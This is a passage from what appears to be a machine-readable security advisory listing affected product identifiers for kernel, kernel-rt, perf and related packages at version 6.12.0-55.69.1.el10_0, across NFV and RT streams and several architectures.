"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
